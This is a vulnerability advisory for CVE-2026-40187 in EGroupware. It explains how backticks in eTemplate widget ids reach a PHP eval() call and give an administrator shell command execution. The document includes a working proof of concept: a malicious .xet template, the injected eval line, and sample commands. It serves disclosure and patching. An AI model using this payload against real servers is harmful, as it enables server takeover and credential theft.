PT-2026-56213 · Packagist · Egroupware/Egroupware
Published
2026-07-07
·
Updated
2026-07-07
·
CVE-2026-40187
CVSS v4.0
8.6
High
| Vector | AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
Summary
An authenticated administrator can achieve OS-level Remote Code Execution (RCE) by uploading a malicious eTemplate XML file (
.xet) to the VFS /etemplates mount.The
Widget::expand name() method passes template widget attribute values directly into a PHP eval() call with only double-quote escaping applied - backtick characters are not escaped.In PHP, backticks inside a double-quoted
eval() string execute shell commands. This allows an admin-level user to escalate from web
application access to arbitrary OS command execution on the server.Details
The vulnerability is located in
api/src/Etemplate/Widget.php, Widget::expand name(): (lines 703–728)The method is designed to expand PHP variables (e.g.,
$row, $col,$cont[id]) in widget attribute values for auto-repeat grids. The eval() is triggered whenever $name contains a $ character (line 706). The only sanitization applied before the eval is:php
str replace('"', '"', $name)This escapes double quotes only. Backtick characters are not escaped. In PHP, backticks inside a double-quoted string in
eval() are treated as shell execution operators — equivalent to shell exec(). A widget id of $rowid`` produces:eval('$name = "$row`id`";'); // executes shell command: idexpand name() is called from:form name()expand widget()set attrs()Template::run()
The
/etemplates VFS path is created exclusively for admin users — it is chgrp'd to Admins and chmod'd to 075 (Admins group has full rwx): class.filemanager admin.inc.php:95-106Custom templates in
/etemplates take precedence over built-in filesystem templates, meaning a malicious template can silently override any existing application template.Mitigating factor: The official Docker deployment sets
disable functions = exec,passthru,shell exec,system,proc open,popen in php.ini, which also blocks PHP backtick execution (backticks internally call shell exec). Non-Docker or non-hardened deployments without this php.ini setting are fully vulnerable. Dockerfile:47The current master branch in api/setup/setup.inc.php, confirming the vulnerability is present in the latest code as of today. setup.inc.php:14-17
Proof of Concept (PoC)
Prerequisites
- Admin account
- Non-Docker deployment, or Docker deployment where disable functions has been removed/modified in php.ini
Step 1 — Mount /etemplates:
Log in as admin, navigate to Admin → Filemanager → VFS Mounts, and click "Install custom templates". This executes the code in
filemanager admin.inc.php that mounts /etemplates with Admins-group write access.Step 2 — Upload malicious template:
Create a file named
index.xet with the following content:xml
<?xml version="1.0" encoding="UTF-8"?>
<overlay>
<template id="admin.index">
<grid>
<columns><column/></columns>
<rows>
<row>
<textbox id="$row`touch /tmp/pwned egw 2>/dev/null`"/>
</row>
</rows>
</grid>
</template>
</overlay>Upload this file to
/etemplates/admin/templates/default/index.xet via the VFS filemanager.Step 3 — Trigger execution:
Navigate to the EGroupware admin panel:
https://<target>/egroupware/index.php?menuaction=admin.admin ui.index When the template is loaded and beforeSendToClient() runs, form name() calls expand name() with $name = '$rowtouch /tmp/pwned egw 2>/dev/null
'and$row = 0. The eval becomes:eval('$name = "$row`touch /tmp/pwned egw 2>/dev/null`";');
PHP executes the backtick expression as a shell command.
Step 4 — Verify:
Check that
/tmp/pwned egw was created on the server. For a more impactful demonstration, replace touch /tmp/pwned egw with id > /tmp/pwned egw to capture the web server's OS user identity.Impact
Authenticated Remote Code Execution (RCE) via eval() with unsanitized shell metacharacters.
Who is impacted: Any EGroupware installation where:
- An admin account is compromised or a malicious admin exists, AND
- The server is not running with disable functions blocking shell exec (i.e., non-Docker or misconfigured deployments)
Severity
The vulnerability allows escalation from EGroupware admin-level web access to arbitrary OS command execution as the web server user (typically www-data). From there, an attacker can read configuration files (including database credentials), pivot to other services, or establish persistence. This is not exploitable by regular (non-admin) users. The official Docker deployment is not affected due to disable functions, but bare-metal, VM, or custom container deployments without this hardening are fully vulnerable.
Fix
Eval Injection
OS Command Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Egroupware/Egroupware